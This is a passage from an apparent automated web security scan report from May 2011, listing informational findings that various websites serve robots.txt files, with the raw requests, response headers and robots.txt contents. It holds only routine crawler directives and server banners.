Request

GET /robots.txt HTTP/1.0
Host: www.checkcity.com

Response

HTTP/1.1 200 OK
Content-Length: 416
Content-Type: text/plain
Last-Modified: Thu, 24 Mar 2011 15:54:10 GMT
Accept-Ranges: bytes
ETag: "7c1719b73beacb1:24a9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET:
X-UA-Compatible: IE=EmulateIE7: X-UA-Compatible: IE=EmulateIE7
Date: Tue, 03 May 2011 10:35:55 GMT
Connection: close

User-Agent: *
Disallow: /blog/archive.aspx
Disallow: /blog/author/
Disallow: /blog/2008/
Disallow: /blog/2009/
Disallow: /blog/2010/
Disallow: /blog/2011/
Disallow: /blog/contact.aspx
Disallow
...[SNIP]...

26.227. http://www.chefuniforms.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.chefuniforms.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chefuniforms.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 09 Feb 2007 15:49:58 GMT
Accept-Ranges: bytes
ETag: "eed92f3614cc71:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:02:09 GMT
Connection: close
Content-Length: 48
Set-Cookie: Coyote-2-a6b6422=a6b645e:0; path=/

User-agent: *
Disallow: /frames
Disallow: /img

26.228. http://www.chemicalelements.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.chemicalelements.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chemicalelements.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:44:04 GMT
Server: Apache/2.2.17
Last-Modified: Thu, 12 Feb 2009 04:32:00 GMT
ETag: "1e-462b133861000"
Accept-Ranges: bytes
Content-Length: 30
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ads/

26.229. http://www.chicagohistory.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.chicagohistory.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chicagohistory.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:28:40 GMT
Server: Zope/(Zope 2.10.7-final, python 2.4.4, win32) ZServer/1.1 Plone/3.1.7
Last-Modified: Fri, 09 Feb 2007 12:40:57 GMT
Content-Length: 549
Content-Type: text/plain; charset=utf-8
Via: 1.0 www.chicagohistory.org
Connection: close

# Define access-restrictions for robots/spiders
# http://www.robotstxt.org/wc/norobots.html

# By default we allow robots to access all areas of our site
# already accessible to anonymous users

Us
...[SNIP]...

26.230. http://www.childdevelopmentinfo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.childdevelopmentinfo.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.childdevelopmentinfo.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Sun, 24 Oct 2010 23:14:46 GMT
ETag: "ae076c-397-493650a9ec580"
Accept-Ranges: bytes
Content-Length: 919
Connection: close
Content-Type: text/plain

# robots.txt for http://www.childdevelopmentinfo.com/

User-agent: *
Disallow: /admin/
Disallow: /bm.assets
Disallow: /bm.comments
Disallow: /bm.doc
Disallow: /bm.pix
Disallow: /bm.tags
Disallow: /bma
...[SNIP]...

26.231. http://www.chnlove.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.chnlove.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chnlove.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:23:48 GMT
Server: Apache
Last-Modified: Mon, 14 Dec 2009 13:14:06 GMT
ETag: "234992d-17-47ab00c4c4380"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

26.232. http://www.churchjobs.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.churchjobs.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.churchjobs.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:12:55 GMT
Server: Apache/2.2.17
Last-Modified: Sat, 18 Feb 2006 21:45:24 GMT
ETag: "8b-40d1894394500"
Accept-Ranges: bytes
Content-Length: 139
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: * # directed to all spiders, not just Scooter
Disallow: /cgi-bin/
Disallow: /jobs/resumes/
Disallow: /registrations/

26.233. http://www.churchleaderinsights.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.churchleaderinsights.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.churchleaderinsights.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:31 GMT
Server: Apache
Last-Modified: Thu, 14 Apr 2011 14:10:16 GMT
ETag: "1acd216-f2-4a0e17c0aa200"
Accept-Ranges: bytes
Content-Length: 242
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/
Disallow: /errors/
Disallow: /membershipbundle12_07.php
Disallow: /g5Im2.php
Disallow: /telecoaching/
Disallow: /dl
...[SNIP]...

26.234. http://www.cieaura.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cieaura.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cieaura.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:40:34 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Thu, 29 May 2008 19:25:36 GMT
ETag: "1c8c70f-d2-44e637e632c00"
Accept-Ranges: bytes
Content-Length: 210
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /v
Disallow: /addtofav.dhtml
Disallow: /savereview.dhtml
Disallow: /search.dhtml
Disallow: /password.dhtml
Disallow: /login.dhtml
Disallow: /terms_of_use.dhtml
Disallow: /feedb
...[SNIP]...

26.235. http://www.cigarettemachines.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cigarettemachines.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cigarettemachines.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:45:22 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.cigarettemachines.net/xmlrpc.php
Set-Cookie: PHPSESSID=bae4201fd54b18a28f661d55efea55d4; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.cigarettemachines.net/sitemap.xml.gz

26.236. http://www.cirruscasino.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cirruscasino.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cirruscasino.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:34:01 GMT
Server: Apache
Last-Modified: Wed, 21 Apr 2010 23:23:53 GMT
ETag: "c4984db-49-484c77cbd9440"
Accept-Ranges: bytes
Content-Length: 73
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /

Sitemap: http://www.cirruscasino.net/sitemap.xml

26.237. http://www.citrix.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.citrix.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.citrix.com

Response

HTTP/1.1 200 OK
Content-Length: 91
Content-Type: text/plain
Last-Modified: Thu, 22 Oct 2009 23:28:04 GMT
Accept-Ranges: bytes
ETag: "01a7d4d6f53ca1:f7f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:16:45 GMT
Connection: keep-alive

User-agent: *
Allow: /

# Sitemap files
Sitemap: http://www.citrix.com/sitemap.xml.gz

26.238. http://www.citydeals.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.citydeals.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.citydeals.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:59 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 04 Mar 2011 21:14:38 GMT
ETag: "2641e99-61-49daea2338b80"
Accept-Ranges: bytes
Content-Length: 97
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /js/
#Sitemap: http://www.citydeals.com/sitemap.gz

26.239. http://www.classical.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.classical.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.classical.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:01:44 GMT
Server: Apache/2.2.17
Last-Modified: Tue, 17 Jun 2008 22:52:58 GMT
ETag: "18-44fe49af92680"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.240. http://www.classicsonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.classicsonline.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.classicsonline.com

Response

HTTP/1.1 200 OK
Content-Length: 252
Content-Type: text/plain
Last-Modified: Tue, 22 Jun 2010 03:34:26 GMT
Accept-Ranges: bytes
ETag: "193b8ad0bb11cb1:2fa9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:54:43 GMT
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.classicsonline.com/col_sitemap1.xml
Sitemap: http://www.classicsonline.com/col_sitemap2.xml
Sitemap: http://www.classicsonline.com/col_sitemap3.xml
Sit
...[SNIP]...

26.241. http://www.classicwordgames.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.classicwordgames.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.classicwordgames.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:48:48 GMT
Server: Apache
Last-Modified: Wed, 15 Sep 2010 12:38:43 GMT
ETag: "57085-1f-4904b9c1dfac0"
Accept-Ranges: bytes
Content-Length: 31
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /*.swf$

26.242. http://www.clevelandcountyschools.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.clevelandcountyschools.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clevelandcountyschools.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:53:54 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 09 Jul 2010 14:12:39 GMT
ETag: "b1a035-130-48af4fed703c0"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

26.243. http://www.clevelandgolf.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.clevelandgolf.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clevelandgolf.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:36 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 23:12:44 GMT
ETag: "928142-49-4a175e0f15300"
Accept-Ranges: bytes
Content-Length: 73
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:
sitemap: http://www.clevelandgolf.com/sitemap.xml

26.244. http://www.clubpogo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.clubpogo.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clubpogo.com

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=48EE223AFF45D3B7E1F83564BE05360D.000211; Domain=.pogo.com; Path=/
Content-Language: en-US
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 433
Date: Tue, 03 May 2011 10:56:06 GMT
Server: Apache-Coyote/1.1
Connection: Keep-Alive

User-agent: *

Disallow: /account/
Disallow: /action/
Disallow: /avatar/
Disallow: /challenge/
Disallow: /error/
Disallow: /favorites/
Disallow: /friends.do
Disallow: /game/help.do
Disallow: /game/
...[SNIP]...

26.245. http://www.cmsmallengines.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cmsmallengines.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cmsmallengines.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:20:53 GMT
Server: Apache
Last-Modified: Sat, 02 Jan 2010 21:15:15 GMT
Accept-Ranges: bytes
Content-Length: 189
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /images/
Disallow: /skins/
Disallow: /payments/
Disallow: /admin.php
Disallow: /store_closed.html
Disallow: /core/
Disallow: /lib/
Disallow: /install/
Disallow: /js/

26.246. http://www.cnyric.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnyric.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cnyric.org

Response

HTTP/1.1 200 OK
Content-Length: 83
Content-Type: text/plain
Content-Location: http://www.cnyric.org/robots.txt
Last-Modified: Thu, 16 Sep 2010 18:24:00 GMT
Accept-Ranges: bytes
ETag: "0601f55cc55cb1:4101"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:25:53 GMT
Connection: close

User-agent: *
Disallow: /protected/
Disallow: /staffonly/
Disallow: /tfilesproc/

26.247. http://www.coincommunity.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.coincommunity.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coincommunity.com

Response

HTTP/1.1 200 OK
Content-Length: 3734
Content-Type: text/plain
Last-Modified: Tue, 25 May 2010 01:20:33 GMT
Accept-Ranges: bytes
ETag: "ba17bd78a8fbca1:ca5c4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:03:38 GMT
Connection: close

## Disallow these user-agents completely, assuming they pay any heed to robots.txt
User-agent: abot
User-agent: ALeadSoftbot
User-agent: BeijingCrawler
User-agent: BilgiBot
User-agent: bot
User-
...[SNIP]...

26.248. http://www.collectibledetective.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.collectibledetective.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.collectibledetective.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Last-Modified: Tue, 15 Jun 2010 00:23:22 GMT
ETag: "14bc572-32-489069ce67280"
Accept-Ranges: bytes
Content-Length: 50
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /admin/
Disallow: /test/

26.249. http://www.collectorcarads.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.collectorcarads.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.collectorcarads.com

Response

HTTP/1.1 200 OK
Content-Length: 2033
Content-Type: text/plain
Last-Modified: Mon, 25 Apr 2011 19:38:13 GMT
Accept-Ranges: bytes
ETag: "482ad51803cc1:aaaa3"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:23:29 GMT
Connection: close

User-Agent: MJ12bot
Disallow:
User-agent: Mediapartners-Google*
Disallow:
User-Agent: OmniExplorer_Bot Disallow: /
User-agent: *
Disallow:/blog/index.php/2009/01/sign-of-the-times-the-end-of-z-
...[SNIP]...

26.250. http://www.collegecaptain.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.collegecaptain.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.collegecaptain.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 31 Aug 2010 15:33:42 GMT
Accept-Ranges: bytes
ETag: "b44a80e42149cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:34:20 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

26.251. http://www.collegeotr.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.collegeotr.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.collegeotr.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:45 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 26 Jan 2010 22:55:26 GMT
ETag: "50e56-2b-2e7bf380"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: text/plain; charset=UTF-8

# User-Agent: *
# Disallow: /
# Noindex: /

26.252. http://www.coloring-page.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.coloring-page.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coloring-page.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 08:42:36 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Sat, 13 Mar 2010 15:21:29 GMT
ETag: "545a7c-48-33bb9040"
Accept-Ranges: bytes
Content-Length: 72
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

User-agent: Mediapartners-Google
Disallow:

26.253. http://www.columbus.gov/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.columbus.gov
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.columbus.gov

Response

HTTP/1.1 200 OK
Content-Length: 144
Content-Type: text/plain
Content-Location: http://www.columbus.gov/robots.txt
Last-Modified: Fri, 26 Feb 2010 18:50:07 GMT
Accept-Ranges: bytes
ETag: "ec611d8414b7ca1:5897"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:08:43 GMT
Connection: close

User-agent: *
Dissallow: /*.axd
Dissallow: /home_services_tab.aspx
Dissallow: /BuildingServices
Dissallow: /latmp
Dissallow: /aboutcolumbus

26.254. http://www.com-sub.biz/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.com-sub.biz
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.com-sub.biz

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:33 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.6
Last-Modified: Sat, 28 Nov 2009 06:27:49 GMT
ETag: "e930716-e2-4796881dac340"
Accept-Ranges: bytes
Content-Length: 226
Connection: close
Content-Type: text/plain

# /robots.txt file for http://www.magazinediscountcenter.com/
# mail webmaster@magazinediscountcenter.com for constructive criticism

User-agent: *
Disallow: /admin

Sitemap: http://www.magazinediscou
...[SNIP]...

26.255. http://www.commerceinsurance.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.commerceinsurance.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.commerceinsurance.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:43:40 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 16:53:14 GMT
ETag: "28ba-25-b745b280"
Accept-Ranges: bytes
Content-Length: 37
Connection: close
Content-Type: text/plain
Content-Language: en

User-agent: *
Disallow: /includes/

26.256. http://www.concordmonitor.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.concordmonitor.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.concordmonitor.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 29 Nov 2010 19:34:24 GMT
ETag: "215056e-67c-4963628d09000"
Cache-Control: max-age=1209600
Expires: Mon, 16 May 2011 18:10:35 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
Content-Length: 1660
Date: Tue, 03 May 2011 10:21:30 GMT
X-Varnish: 1349107841 1348202199
Age: 58255
Via: 1.1 varnish
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.257. http://www.concreteexchange.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.concreteexchange.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.concreteexchange.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:42 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 01 Apr 2011 01:18:53 GMT
Accept-Ranges: bytes
Content-Length: 431
Cache-Control: max-age=86400
Expires: Wed, 04 May 2011 10:32:42 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Di
...[SNIP]...

26.258. http://www.conscallhome.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.conscallhome.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.conscallhome.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 22 Jan 2010 13:00:31 GMT
Accept-Ranges: bytes
ETag: "adb9ce0629bca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:42:55 GMT
Connection: close
Content-Length: 512

# robots.txt generated at http://www.mcanerin.com
User-agent: Googlebot
Disallow:
User-agent: twiceler
Disallow: /
User-agent: Gigabot
Disallow: /
User-agent: Scrubby
Disallow: /
User-agent:
...[SNIP]...

26.259. http://www.contentreserve.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.contentreserve.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.contentreserve.com

Response

HTTP/1.1 200 OK
Content-Length: 250
Content-Type: text/plain
Last-Modified: Fri, 13 Oct 2006 17:10:44 GMT
Accept-Ranges: bytes
ETag: "3971985eaeec61:2487"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:08:40 GMT
Connection: close

# robots.txt for ContentReserve & PrivateReserve

User-agent: *
Crawl-delay: 100
Disallow: /admin/
Disallow: /help/
Disallow: /images/
Disallow: /library/
Disallow: /license/
Disallow: /publi
...[SNIP]...

26.260. http://www.copykatchat.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.copykatchat.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.copykatchat.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 11:03:27 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "22d-4d5389ae-0"
Last-Modified: Thu, 10 Feb 2011 06:46:06 GMT
Content-Type: text/plain
Content-Length: 557
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
X-Powered-By: W3 Total Cache/0.9.1.3
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 12:03:27 GMT

User-agent: Mediapartners-Google
Disallow: /admincp/
Disallow: /modcp/
Disallow: /attachment.php
Disallow: /search.php
Disallow: /newreply.php
Disallow: /newthread.php
Disallow: /editpost.php
Disallow
...[SNIP]...

26.261. http://www.corporateboxoffice.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.corporateboxoffice.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.corporateboxoffice.com

Response

HTTP/1.1 200 OK
Content-Length: 2590
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 21:07:42 GMT
Accept-Ranges: bytes
ETag: "0a33d45175cb1:25b8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:55:06 GMT
Connection: close

User-agent: *
Disallow: /ASPDNSFCommon/
Disallow: /ASPDNSFEncrypt/
Disallow: /ASPDNSFGateways/
Disallow: /ASPDNSFPatterns/
Disallow: /ASPDNSFQuickBooks/
Disallow: /bin/
Disallow: /categorydescr
...[SNIP]...

26.262. http://www.corvettecentral.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.corvettecentral.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.corvettecentral.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Type: text/plain
Last-Modified: Tue, 23 Nov 2010 14:48:16 GMT
Accept-Ranges: none
ETag: "1aab70761d8bcb1:0",""
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:12:17 GMT
Connection: close
Content-Length: 222

# Others
User-agent: *
Disallow: /outside/

User-agent: *
Disallow: /requests/

User-agent: *
Disallow: /inc/

User-agent: *
Disallow: /infopia/

User-agent: *
Disallow: /js/

User-age
...[SNIP]...

26.263. http://www.costcentral.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.costcentral.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.costcentral.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:33:59 GMT
Server: Apache/2.2.16 (EL)
Last-Modified: Wed, 10 Mar 2010 21:02:53 GMT
ETag: "1178c9a-117-481789f267940"
Accept-Ranges: bytes
Content-Length: 279
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /addtocart.php
Disallow: /cart.php
Disallow: /account.php
Disallow: /orderhistory.php
Disallow: /pu_realtimeavail.php
Disallow: /pu_stocknotify.php

Sitemap: http://www
...[SNIP]...

26.264. http://www.cowetaschools.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cowetaschools.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cowetaschools.org

Response

HTTP/1.1 200 OK
Content-Length: 304
Content-Type: text/plain
Content-Location: http://www.cowetaschools.org/robots.txt
Last-Modified: Fri, 28 May 2010 07:21:32 GMT
Accept-Ranges: bytes
ETag: "0a69d6536feca1:249a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:08:39 GMT
Connection: close

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

26.265. http://www.coxenterprises.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.coxenterprises.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coxenterprises.com

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/plain
